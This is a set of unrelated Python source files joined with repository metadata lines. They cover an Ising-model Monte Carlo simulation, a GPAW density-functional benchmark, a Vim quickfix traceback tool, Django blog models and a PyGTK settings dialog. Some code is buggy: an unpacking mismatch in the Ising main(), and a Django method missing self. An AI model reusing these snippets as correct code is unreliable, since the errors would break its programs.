#squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensityi vb')
#np.savetxt( 'intensity_vb_grid%i_M%i_numsamp%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples),intensities, delimiter=',')
| gpl-2.0 | 6,435,820,772,835,654,000 | 41.066079 | 229 | 0.640591 | false |
larsjbro/FYS4150 | project_4/source/ising2dim_visual_v3.py | 1 | 19386 | # coding=utf-8
# 2-dimensional ising model with visualization
# Written by Kyrre Ness Sjoebaek
from __future__ import division
import matplotlib.pyplot as plt
from numba import jit
import numpy
import numpy as np
import sys
import math
import pygame
from timeit import default_timer as timer
from scipy import integrate
from scipy import special
# Needed for visualize when using SDL
SCREEN = None
FONT = None
BLOCKSIZE = 10
T_CRITICAL = 2./ np.log(1+np.sqrt(2))
@jit(nopython=True)
def periodic(i, limit, add):
"""
Choose correct matrix index with periodic
boundary conditions
Input:
- i: Base index
- limit: Highest \"legal\" index
- add: Number to add or subtract from i
"""
return (i + limit + add) % limit
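# Example: on a 10-site axis, periodic(0, 10, -1) wraps to index 9 and
# periodic(9, 10, 1) wraps back to 0, which is what makes the lattice toroidal.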
def dump_to_terminal(spin_matrix, temp, E, M):
# Simple terminal dump
print "temp:", temp, "E:", E, "M:", M
print spin_matrix
def pretty_print_to_terminal(spin_matrix, temp, E, M):
# Pretty-print to terminal
out = ""
size = len(spin_matrix)
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
out += "X"
else:
out += " "
out += "\n"
print "temp:", temp, "E:", E, "M:", M
print out + "\n"
def display_single_pixel(spin_matrix, temp, E, M):
# SDL single-pixel (useful for large arrays)
size = len(spin_matrix)
SCREEN.lock()
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
SCREEN.set_at((x, y), (255, 255, 255))
else:
SCREEN.set_at((x, y), (0, 0, 0))
SCREEN.unlock()
pygame.display.flip()
def display_block(spin_matrix, temp, E, M):
# SDL block (usefull for smaller arrays)
size = len(spin_matrix)
SCREEN.lock()
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (255, 255, 255), rect)
else:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (0, 0, 0), rect)
SCREEN.unlock()
pygame.display.flip()
def display_block_with_data(spin_matrix, temp, E, M):
# SDL block w/ data-display
size = len(spin_matrix)
SCREEN.lock()
for y in xrange(size):
for x in xrange(size):
if spin_matrix.item(x, y) == 1:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (255, 255, 255), rect)
else:
rect = pygame.Rect(x * BLOCKSIZE, y * BLOCKSIZE, BLOCKSIZE, BLOCKSIZE)
pygame.draw.rect(SCREEN, (0, 0, 0), rect)
    s = FONT.render("<E> = %5.3E; <M> = %5.3E" % (E, M), False, (255, 0, 0))
SCREEN.blit(s, (0, 0))
SCREEN.unlock()
pygame.display.flip()
def get_visualize_function(method):
vis_methods = {0: dump_to_terminal,
1:pretty_print_to_terminal,
2:display_single_pixel, # (useful for large arrays)
3:display_block, # (usefull for smaller arrays)
4:display_block_with_data}
def plot_nothing(spin_matrix, temp, E, M):
pass
return vis_methods.get(method, plot_nothing)
def visualize(spin_matrix, temp, E, M, method):
"""
Visualize the spin matrix
Methods:
method = -1:No visualization (testing)
method = 0: Just print it to the terminal
method = 1: Pretty-print to terminal
method = 2: SDL/pygame single-pixel
    method = 3: SDL/pygame rectangle
    method = 4: SDL/pygame rectangle with E/M data overlay
    """
get_visualize_function(method)(spin_matrix, temp, E, M)
@jit(nopython=True)
def metropolis(E, M, w, size, spin_matrix):
# Metropolis
# Loop over all spins, pick a random spin each time
number_of_accepted_configurations = 0
for s in xrange(size**2):
x = int(numpy.random.random() * size)
y = int(numpy.random.random() * size)
deltaE = 2 * spin_matrix[x, y] * (spin_matrix[periodic(x, size, -1), y]
+ spin_matrix[periodic(x, size, 1), y]
+ spin_matrix[x, periodic(y, size, -1)]
+ spin_matrix[x, periodic(y, size, 1)])
accept = numpy.random.random() <= w[deltaE + 8]
if accept:
spin_matrix[x, y] *= -1
M += 2 * spin_matrix[x, y]
E += deltaE
number_of_accepted_configurations += 1
return E, M, number_of_accepted_configurations
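# Note on the acceptance table used above: a single spin flip on the square lattice can
# only change the energy by deltaE in {-8, -4, 0, 4, 8} (units of J), so monteCarlo()
# pre-computes w[deltaE + 8] = exp(-deltaE / T) once per temperature instead of
# evaluating exp() inside the inner Metropolis loop.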
@jit(nopython=True)
def _compute_initial_energy(spin_matrix, size):
# Calculate initial energy
E = 0
for j in xrange(size):
for i in xrange(size):
E -= spin_matrix[i, j] * (spin_matrix[periodic(i, size, -1), j]
+ spin_matrix[i, periodic(j, size, 1)])
return E
def monteCarlo(temp, size, trials, visualizer=None, spin_matrix='ordered'):
"""
Calculate the energy and magnetization
(\"straight\" and squared) for a given temperature
Input:
- temp: Temperature to calculate for units Kb Kelvin / J
- size: dimension of square matrix
- trials: Monte-carlo trials (how many times do we
flip the matrix?)
- visual_method: What method should we use to visualize?
Output:
- E_av: Energy of matrix averaged over trials, normalized to spins**2
- E_variance: Variance of energy, same normalization * temp**2
- M_av: Magnetic field of matrix, averaged over trials, normalized to spins**2
- M_variance: Variance of magnetic field, same normalization * temp
- Mabs: Absolute value of magnetic field, averaged over trials
- Mabs_variance
- num_accepted_configs
"""
if visualizer is None:
visualizer = get_visualize_function(method=None) # No visualization
# Setup spin matrix, initialize to ground state
if spin_matrix == 'ordered':
spin_matrix = numpy.zeros((size, size), numpy.int8) + 1
elif spin_matrix == 'random':
        spin_matrix = numpy.where(numpy.random.random((size, size)) > 0.5, 1, -1).astype(numpy.int8)
else:
raise NotImplementedError('method')
# Create and initialize variables
E_av = E2_av = M_av = M2_av = Mabs_av = 0.0
# Setup array for possible energy changes
w = numpy.zeros(17, dtype=float)
for de in xrange(-8, 9, 4): # include +8
w[de + 8] = math.exp(-de / temp)
# Calculate initial magnetization:
M = spin_matrix.sum()
E = _compute_initial_energy(spin_matrix, size)
total_accepted_configs = 0
# Start metropolis MonteCarlo computation
for i in xrange(trials):
E, M, num_accepted_configs = metropolis(E, M, w, size, spin_matrix)
# Update expectation values
total_accepted_configs += num_accepted_configs
E_av += E
E2_av += E**2
M_av += M
M2_av += M**2
Mabs_av += int(math.fabs(M))
visualizer(spin_matrix, temp, E / float(size**2), M / float(size**2))
# Normalize average values
E_av /= float(trials)
E2_av /= float(trials)
M_av /= float(trials)
M2_av /= float(trials)
Mabs_av /= float(trials)
# Calculate variance and normalize to per-point and temp
E_variance = (E2_av - E_av * E_av) / float(size * size * temp * temp)
M_variance = (M2_av - M_av * M_av) / float(size * size * temp)
Mabs_variance = (M2_av - Mabs_av * Mabs_av) / float(size * size * temp)
# Normalize returned averages to per-point
E_av /= float(size * size)
M_av /= float(size * size)
Mabs_av /= float(size * size)
return E_av, E_variance, M_av, M_variance, Mabs_av, Mabs_variance, total_accepted_configs
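# Typical headless use (the visualizer argument defaults to a no-op, so no pygame needed):
#   E, varE, M, varM, Mabs, varMabs, n_acc = monteCarlo(temp=2.4, size=20, trials=1000)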
def initialize_pygame(size, method):
global SCREEN, FONT
# Initialize pygame
if method == 2 or method == 3 or method == 4:
pygame.init()
if method == 2:
SCREEN = pygame.display.set_mode((size, size))
elif method == 3:
SCREEN = pygame.display.set_mode((size * 10, size * 10))
elif method == 4:
SCREEN = pygame.display.set_mode((size * 10, size * 10))
FONT = pygame.font.Font(None, 12)
def partition2(T):
'''
Return the partition2 function for 2x2 lattice
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
'''
z = 12+4*np.cosh(8.0/T)
return z
def partition(T, size=2):
'''
Return the partition function for size x size lattice
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
'''
    # Completed using Onsager's closed form (assumption: J = 1, k_B = 1, scalar T):
    # ln Z / N = ln(2 cosh(2/T)) + (1/2pi) Int_0^pi ln(0.5*(1 + sqrt(1 - kappa^2 sin(t)^2))) dt
    kappa = 2*np.sinh(2./T)/np.cosh(2./T)**2
    N = size**2
    integrand = lambda t: np.log(0.5*(1. + np.sqrt(1. - (kappa*np.sin(t))**2)))
    integral, _ = integrate.quad(integrand, 0., np.pi)
    return np.exp(N*(np.log(2.*np.cosh(2./T)) + integral/(2.*np.pi)))
def energy_mean_asymptotic(T):
'''
Return mean energy for size x size lattice normalized by spins**2 * size **2
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
Output:
- E_av: mean of energy, normalized to spins**2
page 428 in lecture notes
'''
denominator = np.tanh(2.0/T)
kappa = 2*denominator/np.cosh(2./T)
k1 = special.ellipk(kappa**2)
# k = 1./np.sinh(2.0/T)**2
# def integrand(theta):
# return 1./np.sqrt(1-4.*k*(np.sin(theta)/(1+k))**2)
# k11, abserr = integrate.quad(integrand, 0, np.pi/2, epsabs=1e-3, epsrel=1e-3)
return -(1+ 2/np.pi *(2*denominator**2-1)*k1)/denominator
def energy_mean2(T):
'''
Return mean energy for 2 x 2 lattice normalized by spins**2 * 4
Parameters:
-----------
T: arraylike
normalized temperature in units of kb*K/J, kb = boltzmann's constant, K = Kelvin,
J is the coupling constant expressing the strength of the interaction between neighbouring spins
Output:
- E_av: mean of energy, normalized to spins**2
'''
size = 2
return -8*np.sinh(8.0/T)/(np.cosh(8.0/T)+3)/size**2
def energy_variance2(T):
'''
Return variance of energy for 2 x 2 lattice normalized by spins**2 * 4 * T**2
Output:
-E_variance: Variance of energy, same normalization * temp**2 per cell
'''
size = 2
return 64.0*(1.+3.*np.cosh(8.0/T))/(np.cosh(8.0/T)+3)**2 / size**2 / T**2
def energy_variance(T):
'''
Return variance of energy for size x size lattice normalized by spins**2 * size**2 * T**2
Output:
-E_variance: Variance of energy, same normalization * temp**2 per cell
'''
tanh2 = np.tanh(2./T)**2
kappa = 2*np.sinh(2./T)/np.cosh(2./T)**2
# N = size**2
k1 = special.ellipk(kappa**2)
k2 = special.ellipe(kappa**2)
return 4/np.pi * (k1-k2 -(1-tanh2)*(np.pi/2+(2*tanh2-1)*k1))/tanh2/T**2
def energy_mean_and_variance2(temperature):
return energy_mean2(temperature), energy_variance2(temperature)
def specific_heat2(T):
return energy_variance2(T)
def magnetization_spontaneous_asymptotic(T):
""" Return spontaneous magnetization for size x size lattice normalized by spins**2 * size**2
for T < Tc= 2.269
"""
tanh2 = np.tanh(1./T)**2
return (1 - (1-tanh2)**4/(16*tanh2**2))**(1./8) # pp 429
# return (1 - 1./np.sinh(2./T)**4)**(1./8)
def magnetization_mean2(T):
'''
Output:
- M_av: Magnetic field of matrix, averaged over trials, normalized to spins**2 per cell
'''
return np.where(T>T_CRITICAL, 0, magnetization_spontaneous_asymptotic(T))
def magnetization_variance2(T):
"""Return variance of magnetization for 2 x 2 lattice normalized by spins**2 * 4 * T"""
size = 2 * 2
denominator = np.cosh(8./T) + 3
mean = magnetization_mean2(T) * size
sigma = 8.0 * (np.exp(8./T) + 1) / denominator - mean**2
return sigma / size / T
def magnetization_mean_and_variance2(T):
"""Return normalized mean and variance for the moments of a 2 X 2 ising model."""
return magnetization_mean2(T), magnetization_variance2(T)
def susceptibility2(T):
'''
Output:
- M_variance: Variance of magnetic field, same normalization * temp
'''
return magnetization_variance2(T)
def magnetization_abs_mean2(T):
'''
Lattice 2x2
Output:
- Mabs: Absolute value of magnetic field, averaged over trials per cell
'''
size = 2
return (2*np.exp(8.0/T)+4)/(np.cosh(8.0/T)+3)/size**2
def magnetization_abs_mean_and_variance2(temperature):
"""Return normalized mean and variance for the moments of a 2 X 2 ising model."""
beta = 1. / temperature
size = 2
denominator = (np.cosh(8 * beta) + 3)
mean = 2 * (np.exp(8 * beta) + 2) / denominator
sigma = (8 * (np.exp(8 * beta) + 1) / denominator - mean**2) / temperature
return mean / size**2, sigma / size**2
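# Quick numerical cross-check of the closed-form 2x2 results above. This helper is a
# self-contained sketch (it is not called by the driver code): the mean energy per spin
# must equal -(1/4) d ln Z / d beta, with Z given by partition2() and beta = 1/T.
def _check_energy_mean2_against_partition2(T=1.0, h=1e-6):
    """Return True if energy_mean2(T) matches -(1/4) d ln Z / d beta (finite difference).

    Assumes scalar T; h is the central-difference step in beta."""
    beta = 1.0 / T
    dlnz_dbeta = (np.log(partition2(1.0 / (beta + h))) -
                  np.log(partition2(1.0 / (beta - h)))) / (2.0 * h)
    return np.allclose(-dlnz_dbeta / 4.0, energy_mean2(T), rtol=1e-4)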
def read_input():
"""
method = -1:No visualization (testing)
method = 0: Just print it to the terminal
method = 1: Pretty-print to terminal
method = 2: SDL/pygame single-pixel
method = 3: SDL/pygame rectangle
"""
if len(sys.argv) == 5:
size = int(sys.argv[1])
trials = int(sys.argv[2])
temperature = float(sys.argv[3])
method = int(sys.argv[4])
else:
print "Usage: python", sys.argv[0],\
"lattice_size trials temp method"
sys.exit(0)
if method > 4:
print "method < 3!"
sys.exit(0)
return size, trials, temperature, method
def plot_abs_error_size2(trial_sizes, data, names, truths, temperature):
for i, truth in enumerate(truths):
name = names[i]
print i
plt.loglog(trial_sizes, np.abs(data[:,i] - truth), label=name)
plt.title('T={} $[k_b K / J]$'.format(temperature))
plt.ylabel('Absolute error')
plt.xlabel('Number of trials')
plt.legend(framealpha=0.2)
def plot_rel_error_size2(trial_sizes, data, names, truths, temperature):
for i, truth in enumerate(truths):
name = names[i]
print i
if truth == 0:
scale = 1e-3
else:
scale = np.abs(truth) + 1e-16
plt.loglog(trial_sizes, np.abs(data[:,i] - truth)/scale, label=name)
plt.title('T={} $[k_b K / J]$'.format(temperature))
plt.ylabel('Relative error')
plt.xlabel('Number of trials')
plt.legend(framealpha=0.2)
def compute_monte_carlo(temperature, size, trial_sizes, spin_matrix='ordered'):
data = []
for trials in trial_sizes:
print trials
t0 = timer()
data.append(monteCarlo(temperature, size, trials, spin_matrix=spin_matrix))
print 'elapsed time: {} seconds'.format(timer() - t0)
data = np.array(data)
names = ['Average Energy per spin $E/N$',
'Specific Heat per spin $C_V/N$',
'Average Magnetization per spin $M/N$',
'Susceptibility per spin $var(M)/N$',
'Average |Magnetization| per spin $|M|/N$',
'Variance of |Magnetization| per spin $var(|M|)/N$',
'Number of accepted configurations']
return data, names
def plot_mean_energy_and_magnetization(trial_sizes, data, names, temperature, spin_matrix='ordered'):
ids = [0, 4]
for i in ids:
name = names[i]
print i
plt.semilogx(trial_sizes, data[:,i], label=name)
plt.title('T={} $[k_b K / J]$, {} spin matrix'.format(temperature, spin_matrix))
plt.ylabel('E or |M|')
plt.xlabel('Number of trials')
plt.legend()
def plot_total_number_of_accepted_configs(trial_sizes, data, names, temperature, spin_matrix='ordered'):
i = 6
# for i in ids:
name = names[i]
print i
plt.loglog(trial_sizes, data[:,i], label=name)
x = np.log(trial_sizes)
y = np.log(data[:, i])
mask = np.isfinite(y)
p = np.polyfit(x[mask], y[mask], deg=1)
sgn = '+' if p[1] > 0 else '-'
label_p = 'exp({:2.1f} {} {:2.1f} ln(x))'.format(p[0], sgn, abs(p[1]))
plt.loglog(trial_sizes, np.exp(np.polyval(p, x)), label=label_p)
plt.title('T={} $[k_b K / J]$, {} spin matrix'.format(temperature, spin_matrix))
plt.ylabel('')
plt.xlabel('Number of trials')
plt.legend()
def main(size, trials, temperature, method):
initialize_pygame(size, method)
visualizer = get_visualize_function(method)
(E_av, E_variance, M_av, M_variance, Mabs_av) = monteCarlo(temperature, size, trials, visualizer)
print "T=%15.8E E[E]=%15.8E Var[E]=%15.8E E[M]=%15.8E Var[M]=%15.8E E[|M|]= %15.8E\n" % (temperature, E_av, E_variance, M_av, M_variance, Mabs_av)
pygame.quit()
def task_b(temperatures=(1, 2.4)):
size = 2
trial_sizes = 10**np.arange(1, 6)
for temperature in temperatures:
data, names = compute_monte_carlo(temperature, size, trial_sizes)
truths = (energy_mean_and_variance2(temperature)
+ magnetization_mean_and_variance2(temperature)
+ magnetization_abs_mean_and_variance2(temperature))
plt.figure()
plot_abs_error_size2(trial_sizes, data, names, truths, temperature)
plt.savefig('task_b_abserr_T{}_size{}.png'.format(temperature, 2))
plt.figure()
plot_rel_error_size2(trial_sizes, data, names, truths, temperature)
plt.savefig('task_b_relerr_T{}_size{}.png'.format(temperature, 2))
# plt.show('hold')
def task_c(temperatures=(1,)):
trial_sizes = [10, 30, 100, 300, 1000, 3000, 10000, 30000, 100000] # 10**np.arange(1, 5)
for temperature in temperatures:
print temperature
size = 20
for spin_matrix in ['ordered', 'random']:
data, names = compute_monte_carlo(temperature, size, trial_sizes, spin_matrix)
plt.figure()
plot_mean_energy_and_magnetization(trial_sizes, data, names, temperature, spin_matrix)
plt.savefig('task_c_T{}_size{}_{}.png'.format(temperature, 20, spin_matrix))
plt.figure()
plot_total_number_of_accepted_configs(trial_sizes, data, names, temperature, spin_matrix)
plt.savefig('task_c_accepted_T{}_size{}_{}.png'.format(temperature, 20, spin_matrix))
# plt.show('hold')
if __name__ == '__main__':
# T=2.4
#
# print energy_mean2(T), energy_mean_asymptotic(T), magnetization_spontaneous_asymptotic(T), magnetization_mean2(T)
# print energy_variance2(T)/energy_variance(T)
# task_b(temperatures=(1,2.4))
# task_c(temperatures=(1, 2.0, 2.4, 5, 10))
task_c(temperatures=(1, 2.4))
plt.show('hold')
# Main program
# # Get input
# # size, trials, temperature, method = read_input()
# size = 2
# trials = 1000
# temperature = 4
# method = -1
#
# main(size, trials, temperature, method)
# print energy_mean_and_variance2(temperature)
# print magnetization_mean_and_variance2(temperature)
# print magnetization_abs_mean_and_variance2(temperature)
| bsd-2-clause | -7,475,104,795,903,891,000 | 30.419773 | 150 | 0.599608 | false |
robwarm/gpaw-symm | gpaw/test/big/tpss/tpss.py | 1 | 3276 | from ase import Atoms
from ase.structure import molecule
from ase.parallel import paropen
from gpaw import GPAW, Mixer, MixerDif
from gpaw.utilities.tools import split_formula
cell = [14.4, 14.4, 14.4]
data = paropen('data.txt', 'a')
##Reference from J. Chem. Phys. Vol 120 No. 15, 15 April 2004, page 6898
tpss_de = [
('H2' , 112.9),
('LiH', 59.1),
('OH' , 106.8),
('HF' , 139.1),
('Li2', 22.5),
('LiF', 135.7),
('Be2', 8.1),
('CO' , 254.2),
('N2' , 227.7),
('O2' , 126.9),
('F2' , 46.4),
('P2' , 116.1),
('Cl2', 60.8)
]
exp_bonds_dE = [
('H2' , 0.741,109.5),
('LiH', 1.595,57.8),
('OH' , 0.970,106.4),
('HF' , 0.917,140.8),
('Li2', 2.673,24.4),
('LiF', 1.564,138.9),
('Be2', 2.440,3.0),
('CO' , 1.128,259.3),
('N2' , 1.098,228.5),
('O2' , 1.208,120.5),
('F2' , 1.412,38.5),
('P2' , 1.893,117.3),
('Cl2', 1.988,58.0)
]
systems = [ a[0] for a in tpss_de ]
ref = [ a[1] for a in tpss_de ]
# Add atoms
for formula in systems:
temp = split_formula(formula)
for atom in temp:
if atom not in systems:
systems.append(atom)
energies = {}
# Calculate energies
i = 0
for formula in systems:
if formula == 'Be2':
loa = Atoms('Be2', [(0, 0, 0), (0, 0, 2.0212)])
else:
loa = molecule(formula)
loa.set_cell(cell)
loa.center()
width = 0.0
calc = GPAW(h=.18,
nbands=-5,
maxiter=333,
xc='PBE',
txt=formula + '.txt')
if len(loa) == 1:
calc.set(hund=True)
calc.set(fixmom=True)
calc.set(mixer=MixerDif())
calc.set(eigensolver='cg')
else:
calc.set(mixer=Mixer())
pos = loa.get_positions()
pos[1,:] = pos[0,:] + [exp_bonds_dE[i][1],0.0,0.0]
loa.set_positions(pos)
loa.center()
loa.set_calculator(calc)
try:
energy = loa.get_potential_energy()
difft = calc.get_xc_difference('TPSS')
diffr = calc.get_xc_difference('revTPSS')
diffm = calc.get_xc_difference('M06L')
energies[formula]=(energy, energy+difft, energy+diffr,energy+diffm)
except:
print >>data, formula, 'Error'
else:
print >>data, formula, energy, energy+difft, energy+diffr, energy+diffm
data.flush()
i += 1
#calculate atomization energies
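# The atomization energy below is sum(E_atoms) - E_molecule; the factor
# 627.5/27.211 converts eV to kcal/mol (1 Hartree ~ 27.211 eV ~ 627.5 kcal/mol).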
ii =0
file = paropen('atom_en.dat', 'a')
print >>file, "# formula \t PBE \t TPSS \t revTPSS \t M06L \t Exp"
for formula in systems[:13]:
try:
atoms_formula = split_formula(formula)
de_tpss = -1.0 * energies[formula][1]
de_revtpss = -1.0 * energies[formula][2]
de_m06l = -1.0 * energies[formula][3]
de_pbe = -1.0 * energies[formula][0]
for atom_formula in atoms_formula:
de_tpss += energies[atom_formula][1]
de_revtpss += energies[atom_formula][2]
de_m06l += energies[atom_formula][3]
de_pbe += energies[atom_formula][0]
except:
print >>file, formula, 'Error'
else:
de_tpss *= 627.5/27.211
de_revtpss *= 627.5/27.211
de_m06l *= 627.5/27.211
de_pbe *= 627.5/27.211
out = "%s\t%.1f \t%.1f \t%.1f \t%.1f \t%.1f" %(formula, de_pbe, de_tpss, de_revtpss, de_m06l ,exp_bonds_dE[ii][2])
print >>file, out
file.flush()
ii += 1
| gpl-3.0 | -2,241,574,817,692,573,400 | 26.3 | 122 | 0.545482 | false |
tonyxty/quickfix.py | src/quickfix_py/cli.py | 1 | 4853 | #!/usr/bin/env python3
"""Run a Python script and format the exception traceback as Vim quickfix.
quickfix.py
Copyright (C) 2015 Tony Beta Lambda <[email protected]>
This file is licensed under the MIT license. See LICENSE for more details.
"""
import os
import sys
import functools
import argparse
from runpy import run_path
from traceback import extract_tb
from contextlib import redirect_stdout
from quickfix_py import __version__
def run(filename, catch_interrupt=False):
exceptions = (
(Exception, KeyboardInterrupt) if catch_interrupt else Exception
)
try:
run_path(filename, run_name="__main__")
except exceptions:
_, e, tb = sys.exc_info()
return e, extract_tb(tb)[3:]
def extract_error_location(exc, filename_filter=None):
e, tb = exc
if isinstance(e, SyntaxError):
# yield the line triggering SyntaxError
yield (e.filename, e.lineno, "{}: {}".format(type(e).__name__, e.msg))
if tb is not None:
r = (
(filename, lineno, "in function " + fnname)
for filename, lineno, fnname, text in tb
if text is not None
)
if filename_filter is not None:
r = (_ for _ in r if filename_filter(_[0]))
r = list(r)
try:
filename, lineno, _ = r.pop()
except IndexError:
return
# insert error message to the first returned location
yield filename, lineno, "{}: {}".format(type(e).__name__, e)
yield from reversed(r)
# writable by user and directory components do not start with a dot
@functools.lru_cache(maxsize=32)
def is_user_heuristic(filename):
return os.access(filename, os.W_OK) and not any(
s != "." and s.startswith(".") for s in filename.split(os.sep)
)
def get_parser():
"""Defines options for quickfix.py."""
parser = argparse.ArgumentParser(
prog="quickfix.py",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=(
"run a Python script and format the exception "
"traceback as Vim quickfix"
),
epilog="Fork me on GitHub: https://github.com/tonyxty/quickfix.py",
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="be more verbose"
)
parser.add_argument(
"-V",
"--version",
action="version",
version="%(prog)s {}".format(__version__),
)
parser.add_argument("-o", "--output", help="specify quickfix output file")
parser.add_argument(
"-i",
"--interrupt",
action="store_true",
help="catch ^C (useful when locating an infinite loop)",
)
parser.add_argument(
"-a",
"--all",
action="store_true",
help="print all files instead of just user files",
)
parser.add_argument(
"-f",
"--fuck",
action="store_true",
help=(
"print a line of command that opens $EDITOR / sensible-editor "
"at the last error location"
),
)
return parser
def main(args=None):
invocation = sys.argv[0]
parser = get_parser()
(options, args) = parser.parse_known_args(args)
if invocation == "thefuck.py":
options.fuck = True
sys.argv[:] = args
if len(args) > 0 and (args[0] == "python3" or args[0] == "python"):
filename_index = 1
else:
filename_index = 0
try:
filename = args[filename_index]
except IndexError:
if options.fuck:
print("#", end=" ")
print("no file given")
return 2
if options.output is not None:
exc = run(filename, options.interrupt)
else:
# suppress output of exec'ed script
with open(os.devnull, "w") as f:
with redirect_stdout(f):
exc = run(filename, options.interrupt)
if exc is not None:
filename_filter = None if options.all else is_user_heuristic
err_locs = extract_error_location(exc, filename_filter)
if options.output is not None:
outfile = open(options.output, "w")
else:
outfile = sys.stdout
        if options.fuck:
            try:
                filename, lineno, _ = next(err_locs)
            except StopIteration:
                print("# no fuck given", file=outfile)
            else:
                print(
                    os.getenv("EDITOR", "sensible-editor")
                    + " {} +{}".format(filename, lineno),
                    file=outfile,
                )
else:
print(
"\n".join('"{}":{}: {}'.format(*loc) for loc in err_locs),
file=outfile,
)
if outfile is not sys.stdout:
outfile.close()
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
| mit | -1,281,120,865,517,804,500 | 27.715976 | 78 | 0.564187 | false |
jamessqr/james-squires-dotcom | blog/models.py | 1 | 1065 | from django.db import models
import datetime
class Category(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
slug = models.SlugField()
description = models.TextField()
class Meta:
ordering = ['title']
verbose_name_plural = "Categories"
class Admin:
pass
#TODO: This does not work!
#class CategoryAdmin(admin.ModelAdmin):
#prepopulated_fields = {"slug": ("title",)}
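    # Sketch of the usual wiring in a separate admin.py (illustrative, not part
    # of this models module):
    #   from django.contrib import admin
    #   class CategoryAdmin(admin.ModelAdmin):
    #       prepopulated_fields = {"slug": ("title",)}
    #   admin.site.register(Category, CategoryAdmin)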
def __unicode__(self):
return self.title
    def get_absolute_url(self):
return "/categories/%s/" % self.slug
class Entry(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
excerpt = models.TextField(blank=True)
body = models.TextField()
slug = models.SlugField()
pub_date = models.DateTimeField(default=datetime.datetime.now)
class Meta:
ordering = ['title']
verbose_name_plural = "Entries"
class Admin:
pass
def __unicode__(self):
return self.title
def get_absolute_url(self):
return "/%s/%s" % (self.pub_date.strftime("%Y/%m/%d").lower(),self.slug) | bsd-3-clause | -5,629,373,321,651,460,000 | 23.227273 | 77 | 0.694836 | false |
daniel-e/papershelf | dialogs/settings.py | 1 | 2638 | import pygtk
pygtk.require('2.0')
import gtk
class DialogSettings(gtk.Dialog):
def __init__(self, title, parent, flag, settings):
gtk.Dialog.__init__(self, title, parent, flag)
s = settings
self.s = s
t = gtk.Table(rows = 3, columns = 3)
t.set_col_spacings(10)
t.set_row_spacings(10)
l = gtk.Label("PDF Viewer:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 0, 1)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfviewer"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 0, 1)
l.show()
self.pdf_viewer = l
l = gtk.Label("PDF Location:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 1, 2)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdflocation"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 1, 2)
l.show()
self.pdf_location = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_location, None)
t.attach(b, 2, 3, 1, 2)
# ----
l = gtk.Label("Preview converter:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 2, 3)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfconvert"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 2, 3)
l.show()
self.pdf_convert = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_convert, None)
t.attach(b, 2, 3, 2, 3)
# ----
self.vbox.pack_start(t)
t.show()
self.add_button("Ok", 1)
self.add_button("Cancel", 2)
def show(self):
if self.run() == 1:
s = self.s
s.vars["pdfviewer"] = self.pdf_viewer.get_text()
s.vars["pdflocation"] = self.pdf_location.get_text()
s.vars["pdfconvert"] = self.pdf_convert.get_text()
s.commit()
self.destroy()
def choose_pdf_location(self, widget, data = None):
f = gtk.FileChooserDialog("Select a directory", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_location.set_text(f.get_current_folder())
f.destroy()
def choose_pdf_convert(self, widget, data = None):
f = gtk.FileChooserDialog("Select an executable", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
#f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_convert.set_text(f.get_filename())
f.destroy()
| gpl-2.0 | 9,119,678,909,674,186,000 | 26.768421 | 89 | 0.590978 | false |
PAHB/SIgma-Nu-idea-1 | Backend_stuff/sigma_nu/sigma_nu/settings.py | 1 | 3345 | """
Django settings for sigma_nu project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
